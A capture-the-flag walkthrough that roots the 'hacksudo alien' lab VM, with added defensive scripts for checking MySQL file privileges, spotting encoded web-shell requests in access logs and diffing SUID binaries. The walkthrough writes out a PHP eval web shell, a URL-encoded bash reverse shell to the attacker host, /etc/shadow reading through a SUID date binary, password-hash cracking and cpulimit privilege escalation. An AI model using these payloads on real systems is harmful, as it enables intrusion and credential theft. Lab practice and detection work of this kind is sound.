Information gathering

Note: one of the rare target VMs that can be opened directly in VMware Workstation.

  • First, check the Kali IP address:
root at kali in ~/Desktop/hacksudo-aliens 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:be:8f:be brd ff:ff:ff:ff:ff:ff
inet 10.10.8.21/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
valid_lft 1321sec preferred_lft 1321sec
inet6 fe80::ebaa:6e9f:e411:f446/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Host discovery

  • The Nmap ping sweep turns up one IP: 10.10.8.24
root at kali in ~/Desktop/hacksudo-aliens 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 16:39 CST
Nmap scan report for 10.10.8.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000090s latency).
MAC Address: 00:50:56:F2:17:CE (VMware)
Nmap scan report for 10.10.8.24
Host is up (0.060s latency).
MAC Address: 00:0C:29:BF:B0:99 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.00013s latency).
MAC Address: 00:50:56:F2:FA:E7 (VMware)
Nmap scan report for 10.10.8.21
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.68 seconds

Port scan

  • Scan for open ports:
root at kali in ~/Desktop/hacksudo-aliens 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.24 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 16:40 CST
Nmap scan report for 10.10.8.24
Host is up (0.00056s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 31:d8:56:f4:cf:8b:09:e8:a1:5e:2e:dd:ac:08:6b:dd (RSA)
| 256 cd:65:ec:9e:d0:2c:6b:4e:02:40:c3:fd:01:5d:d1:87 (ECDSA)
|_ 256 03:00:28:0e:0b:da:12:68:c3:c5:45:ab:bb:92:92:fa (ED25519)
80/tcp open http
|_http-title: Hacksudo Alien?
9000/tcp open cslistener
MAC Address: 00:0C:29:BF:B0:99 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.50 seconds

Service identification

  • Identify the services behind the open ports:
root at kali in ~/Desktop/hacksudo-aliens 
$ nmap -p22,80,9000 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.24 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 17:02 CST
Nmap scan report for 10.10.8.24
Host is up (0.00075s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 31:d8:56:f4:cf:8b:09:e8:a1:5e:2e:dd:ac:08:6b:dd (RSA)
| 256 cd:65:ec:9e:d0:2c:6b:4e:02:40:c3:fd:01:5d:d1:87 (ECDSA)
|_ 256 03:00:28:0e:0b:da:12:68:c3:c5:45:ab:bb:92:92:fa (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo Alien?
9000/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: phpMyAdmin
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 00:0C:29:BF:B0:99 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.75 ms 10.10.8.24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.33 seconds

Vulnerability scan

  • Run the Nmap vuln scripts:
root at kali in ~/Desktop/hacksudo-aliens 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.24 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-12 16:40 CST
Nmap scan report for 10.10.8.24
Host is up (0.00082s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /backup/: Backup folder w/ directory listing
|_ /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
9000/tcp open cslistener
MAC Address: 00:0C:29:BF:B0:99 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 30.90 seconds
  • Looked through the reported findings; none of them is useful.

Directory scan

root at kali in ~/Desktop/hacksudo-aliens 
$ dirsearch -u http://10.10.8.24 -o $PWD/dirsearch.txt

_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/Desktop/hacksudo-aliens/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-23-12-12_16-42-34.log

Target: http://10.10.8.24/

[16:42:34] Starting:
[16:42:35] 403 - 275B - /.ht_wsr.txt
[16:42:35] 403 - 275B - /.htaccess.bak1
[16:42:35] 403 - 275B - /.htaccess.orig
[16:42:35] 403 - 275B - /.htaccess.save
......

root at kali in ~/Desktop/hacksudo-aliens
$ cat dirsearch.txt | grep 200
200 16B http://10.10.8.24:80/README.md
200 938B http://10.10.8.24:80/backup/
200 17KB http://10.10.8.24:80/favicon.ico
200 941B http://10.10.8.24:80/images/
200 2KB http://10.10.8.24:80/index.html

Exploitation

Sensitive file disclosure

  • Visiting the discovered paths one by one, this is clearly a hand-built site (screenshot).
  • Port 9000 serves a phpMyAdmin page (screenshot).
  • There is a backup-file page (screenshot).
  • Download the backup and take a look (screenshot).
  • It reveals the database credentials: vishal/hacksudo
  • Try them on the phpMyAdmin instance on port 9000 (screenshot).

MySQL file write

  • Check the database privileges of the vishal user (screenshot).
  • They match root's. Search for known phpMyAdmin vulnerabilities; the installed version is 5.1.0:
root at kali in ~/Desktop/hacksudo-aliens 
$ searchsploit phpmyadmin 5.1.0
Exploits: No Results
Shellcodes: No Results
  • No results. Browse through the data in the databases instead (screenshot).

  • Nothing useful there either, so one more approach remains: writing files through MySQL.
  • Check whether the database is allowed to read and write files:
show global variables like '%secure_file_priv%'
  • The value is empty, which is promising (screenshot):
Value    Meaning
NULL     file read/write is not allowed
dir      file read/write is restricted to that directory
empty    file read/write may target any directory
  • Next, determine the site's document root on the target:
select load_file('/var/www/html/index.html')
  • That confirms the site lives under /var/www/html/ (screenshot), so write the web shell there directly:
select '<?php @eval($_REQUEST[1]);echo 404;?>' into dumpfile '/var/www/html/shell.php'
  • Visit it (screenshot).
  • Written successfully.
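The write above only works because two conditions line up: secure_file_priv is empty, and the mysqld process can create files inside the web root. The following script is an added defender-side example, not part of the original write-up, that checks both. It assumes the tab-separated output format of `mysql -N -e` and uses constructed sample paths and values.

```shell
#!/bin/sh
# Added defender-side example, not from the original write-up: it checks the two
# conditions chained above, an empty secure_file_priv and a web root the mysqld
# process can write into. Every path and value below is constructed sample input.

# Pull the Value column out of one line of
#   mysql -N -e "SHOW GLOBAL VARIABLES LIKE 'secure_file_priv'"
# which is tab-separated (Variable_name<TAB>Value). An unset value is an empty
# field; -s drops lines without a tab so a malformed line never reads as a value.
value_from_show_variables() {
  printf '%s\n' "$1" | cut -s -f2
}

# Classify the setting exactly as the table above does. The unrestricted case
# returns 1 so the function can sit directly in an if/&& chain.
classify_secure_file_priv() {
  case "$1" in
    NULL) printf '%s\n' "safe: LOAD_FILE() and INTO OUTFILE/DUMPFILE are disabled"; return 0 ;;
    "")   printf '%s\n' "UNSAFE: file read and write allowed in any directory"; return 1 ;;
    *)    printf '%s\n' "restricted: file read and write limited to $1"; return 0 ;;
  esac
}

# List world-writable directories under a web root. INTO DUMPFILE creates the
# file as the mysqld user, so a web root it cannot write into blocks the shell
# drop even when secure_file_priv is empty.
webroot_writable_dirs() {
  find "$1" -type d -perm -0002 2>/dev/null
}

# Succeeds only when no directory under the web root is world-writable.
webroot_ok() {
  [ -z "$(webroot_writable_dirs "$1")" ]
}

# Live usage (constructed example paths). The configuration fix is to set
#   secure_file_priv = /var/lib/mysql-files
# under [mysqld] and restart the server, and to revoke FILE from application accounts.
#   v=$(value_from_show_variables "$(mysql -N -e "SHOW GLOBAL VARIABLES LIKE 'secure_file_priv'")")
#   classify_secure_file_priv "$v"
#   webroot_ok /var/www/html || webroot_writable_dirs /var/www/html
```

The directory check is deliberately coarse: it only looks at the world-writable bit, which is the case a shared box usually gets wrong. A web root owned by root and served read-only to www-data passes, and that is the state to aim for.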

Bash reverse shell

  • The web shell is in place. On previous boxes I connected with AntSword; here it is far more convenient to call a command-execution function through the web shell and get a reverse shell directly.
  • Start a listener on Kali:
root at kali in ~/Desktop/hacksudo-aliens
$ nc -lvvp 4444
listening on [any] 4444 ...
  • Build a Bash reverse shell one-liner:
bash -c 'bash -i &> /dev/tcp/10.10.8.21/4444 0>&1'
  • URL-encode it with BurpSuite:
%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%26%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%38%2e%32%31%2f%34%34%34%34%20%30%3e%26%31%27
  • The final request looks like this:
http://10.10.8.24/shell.php?1=system("%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%26%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%38%2e%32%31%2f%34%34%34%34%20%30%3e%26%31%27");
  • Reverse shell received:
root at kali in ~/Desktop/hacksudo-aliens
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.24: inverse host lookup failed: Unknown host
connect to [10.10.8.21] from (UNKNOWN) [10.10.8.24] 37756
bash: cannot set terminal process group (672): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
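The request above leaves a distinctive trace in the Apache access log: a PHP file called with a command-execution function and an argument that BurpSuite has percent-encoded byte by byte. The script below is an added defender-side example, not part of the original write-up, that flags such lines whether the indicator appears literally or in that fully hex-encoded form. The log lines are constructed samples modelled on the request shown above; the indicator list and log format (combined format) are assumptions.

```shell
#!/bin/sh
# Added defender-side example, not from the original write-up: scan Apache access
# log lines for the request shape used above. Sample log lines are constructed.

# Percent-encode every byte of a string, producing the form BurpSuite's
# "encode all characters" option emits, e.g. "/dev/tcp" -> "%2f%64%65%76%2f%74%63%70".
hex_encode_all() {
  printf '%s' "$1" | od -An -tx1 | tr -d ' \n' | sed 's/../%&/g'
}

# Return 0 when the request part of a combined-format log line contains one of the
# indicators, either literally or fully percent-encoded. The line is lowercased
# first so %2F and %2f compare equal.
suspicious_request() {
  req=$(printf '%s\n' "$1" | cut -d'"' -f2 | tr 'A-Z' 'a-z')
  for ind in 'system(' 'passthru(' 'shell_exec(' '/dev/tcp/'; do
    enc=$(hex_encode_all "$ind")
    case "$req" in
      *"$ind"*|*"$enc"*) return 0 ;;
    esac
  done
  return 1
}

# Read a log on stdin and print every matching line prefixed with ALERT.
scan_access_log() {
  while IFS= read -r line; do
    if suspicious_request "$line"; then
      printf 'ALERT: %s\n' "$line"
    fi
  done
}

# Constructed sample log: one normal request, the request from the write-up
# (quotes encoded as a browser would send them), and another normal request.
SAMPLE_LOG=$(cat <<'EOF'
10.10.8.21 - - [12/Dec/2023:11:45:02 -0500] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.8.21 - - [12/Dec/2023:11:45:30 -0500] "GET /shell.php?1=system(%22%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%26%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%31%30%2e%38%2e%32%31%2f%34%34%34%34%20%30%3e%26%31%27%22); HTTP/1.1" 200 3 "-" "Mozilla/5.0"
10.10.8.21 - - [12/Dec/2023:11:46:00 -0500] "GET /images/ HTTP/1.1" 200 941 "-" "Mozilla/5.0"
EOF
)

# Live usage: scan_access_log < /var/log/apache2/access.log
# Sample usage: printf '%s\n' "$SAMPLE_LOG" | scan_access_log
```

A substring check of this kind catches the two encodings the write-up actually uses, but partially or doubly encoded payloads (for example `%2573` for `s`) slip past it; a full decode before matching, as a WAF does, is the robust version. Independently of log review, a new .php file appearing in a web root that the application never writes to is the earlier and simpler signal.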

Reading files with date

  • The shell is not running as root, so privilege escalation is needed.
  • Check whether any SUID commands/files exist:
www-data@hacksudo:/var/www/html$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/bin/date
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/ntfs-3g
/usr/bin/bwrap
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
  • One odd entry stands out: date, a command that prints the current system date and time.
www-data@hacksudo:/var/www/html$ date
date
Tue Dec 12 11:46:31 EST 2023
  • But date can also read from a file: with -f it reads date/time strings from the file and prints each one in the current output format, and every line it cannot parse is echoed back in an error message.
  • Does that mean date can be used to read arbitrary files?
  • Try reading /etc/passwd (every user can read it anyway; this is just a test):
www-data@hacksudo:/var/www/html$ date -f /etc/passwd
date -f /etc/passwd
date: invalid date 'root:x:0:0:root:/root:/bin/bash'
date: invalid date 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin'
date: invalid date 'bin:x:2:2:bin:/bin:/usr/sbin/nologin'
date: invalid date 'sys:x:3:3:sys:/dev:/usr/sbin/nologin'
date: invalid date 'sync:x:4:65534:sync:/bin:/bin/sync'
date: invalid date 'games:x:5:60:games:/usr/games:/usr/sbin/nologin'
date: invalid date 'man:x:6:12:man:/var/cache/man:/usr/sbin/nologin'
date: invalid date 'lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin'
date: invalid date 'mail:x:8:8:mail:/var/mail:/usr/sbin/nologin'
date: invalid date 'news:x:9:9:news:/var/spool/news:/usr/sbin/nologin'
......
  • It works, so read /etc/shadow:
www-data@hacksudo:/var/www/html$ date -f /etc/shadow
date -f /etc/shadow
date: invalid date 'root:$6$N6p.dpWhPYXSXC9U$8EraUiQ5DtMF5ov2ZbnY8DoLK1liRukqhTnTTK67MQ.tgpglkVX/I9P1aYjNeO/cwjQk9lJ/ABd9YLTMeMSn3/:18721:0:99999:7:::'
date: invalid date 'daemon:*:18714:0:99999:7:::'
......
date: invalid date 'hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::'
date: invalid date 'systemd-coredump:!!:18714::::::'
date: invalid date 'sshd:*:18714:0:99999:7:::'
date: invalid date 'mysql:!:18720:0:99999:7:::'

Cracking with john

  • Two users have password hashes; save them:
root at kali in ~/Desktop/hacksudo-aliens 
$ vim root_hash

root at kali in ~/Desktop/hacksudo-aliens
$ cat root_hash
root:$6$N6p.dpWhPYXSXC9U$8EraUiQ5DtMF5ov2ZbnY8DoLK1liRukqhTnTTK67MQ.tgpglkVX/I9P1aYjNeO/cwjQk9lJ/ABd9YLTMeMSn3/:18721:0:99999:7:::
hacksudo:$6$cOv4E/VKAe0EVwV4$YScCx10zfi7g4aiLY.qo8QPm2iOogJea41mk2rGk/0JM5AtnrmiyTN5ctNJ0KTLS5Iru4lHWYPug792u3L/Um1:18721:0:99999:7:::
  • Crack them with john:
root at kali in ~/Desktop/hacksudo-aliens 
$ john root_hash
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
aliens (hacksudo)
Proceeding with incremental:ASCII
......
  • One of the passwords cracks: hacksudo/aliens.

  • Log in over SSH:
root at kali in ~/Desktop/hacksudo-aliens 
$ ssh hacksudo@10.10.8.24
hacksudo@10.10.8.24's password:
Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 12 11:59:59 2023 from 10.10.8.21
hacksudo@hacksudo:~$ id
uid=1000(hacksudo) gid=1000(hacksudo) groups=1000(hacksudo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner)

cpulimit SUID

  • This user is not root either, so privilege escalation is needed.
  • Check again for SUID commands/files:
hacksudo@hacksudo:~$ find / -perm -4000 2>/dev/null
/home/hacksudo/Downloads/cpulimit
/usr/bin/date
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/ntfs-3g
/usr/bin/bwrap
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
  • A cpulimit binary shows up; go into the directory and run it:
hacksudo@hacksudo:~$ cd /home/hacksudo/Downloads
hacksudo@hacksudo:~/Downloads$ ./cpulimit
Error: You must specify a target process
CPUlimit version 2.4
Usage: ./cpulimit TARGET [OPTIONS...] [-- PROGRAM]
TARGET must be exactly one of these:
-p, --pid=N pid of the process
-e, --exe=FILE name of the executable program file
The -e option only works when
cpulimit is run with admin rights.
-P, --path=PATH absolute path name of the
executable program file
OPTIONS
-b --background run in background
-f --foreground launch target process in foreground and wait for it to exit
......
  • It looks like a CPU-limiting tool, which I haven't come across before, so check GTFOBins (screenshot).
  • It's there; run it directly:
hacksudo@hacksudo:~/Downloads$ ./cpulimit -l 100 -f -- /bin/bash -p
Process 1429 detected
bash-5.0# id
uid=1000(hacksudo) gid=1000(hacksudo) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),116(lpadmin),117(scanner),1000(hacksudo)
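Both escalations on this box, date reading /etc/shadow and cpulimit spawning a root shell, come from the same root cause: a setuid bit on a binary that has no business carrying one. The script below is an added defender-side example, not part of the original write-up, that compares a `find / -perm -4000` listing against a recorded baseline and reports the rest. The baseline is built from the other entries in the listings above and is assumed to be the Debian 10 default set; a real baseline should be captured from a known-good install.

```shell
#!/bin/sh
# Added defender-side example, not from the original write-up: compare the setuid
# files found with `find / -perm -4000` against a recorded baseline and report the
# rest. The baseline is an assumption for this example, taken from the other
# entries in the listings above (Debian 10 defaults); record your own from a
# known-good host rather than trusting this list.

BASELINE=$(cat <<'EOF'
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/ntfs-3g
/usr/bin/bwrap
/usr/bin/sudo
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
EOF
)

# Read setuid paths from stdin, one per line, and print those not in BASELINE.
# Both findings from the write-up surface this way: /usr/bin/date, which is
# never setuid by default and turns `date -f` into a root-privileged file
# reader, and a setuid copy of cpulimit dropped into a user's home directory.
unexpected_suid() {
  while IFS= read -r path; do
    [ -z "$path" ] && continue
    printf '%s\n' "$BASELINE" | grep -Fxq -- "$path" || printf '%s\n' "$path"
  done
}

# Setuid files under home directories are a finding regardless of the baseline;
# mounting /home with the nosuid option makes the kernel ignore the bit there.
suid_in_home() {
  grep '^/home/'
}

# Constructed sample: a shortened copy of the listing obtained as user hacksudo.
SAMPLE_LISTING=$(cat <<'EOF'
/home/hacksudo/Downloads/cpulimit
/usr/bin/date
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
EOF
)

# Live usage:   find / -type f -perm -4000 2>/dev/null | unexpected_suid
# Sample usage: printf '%s\n' "$SAMPLE_LISTING" | unexpected_suid
```

Run from cron or a configuration-management check, the diff against the baseline is small enough to read by hand, and a new entry such as /usr/bin/date is exactly the kind of change that deserves a question before an attacker asks it. Removing the bit is `chmod u-s` on the file; for binaries that need elevated access only for one operation, file capabilities are the narrower replacement.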
  • Root obtained; grab the flag:
bash-5.0# cd /root
bash-5.0# ls
root.txt
bash-5.0# cat root.txt
_ _ _ _
| | | | __ _ ___| | _____ _ _ __| | ___
| |_| |/ _` |/ __| |/ / __| | | |/ _` |/ _ \
| _ | (_| | (__| <\__ \ |_| | (_| | (_) |
|_| |_|\__,_|\___|_|\_\___/\__,_|\__,_|\___/

_ _ _ ____ __
/ \ | (_) ___ _ __ | ___| / /_
/ _ \ | | |/ _ \ '_ \|___ \| '_ \
/ ___ \| | | __/ | | |___) | (_) |
/_/ \_\_|_|\___|_| |_|____/ \___/

congratulations you rooted hacksudo alien56...!!!
flag={d045e6f9feb79e94442213f9d008ac48}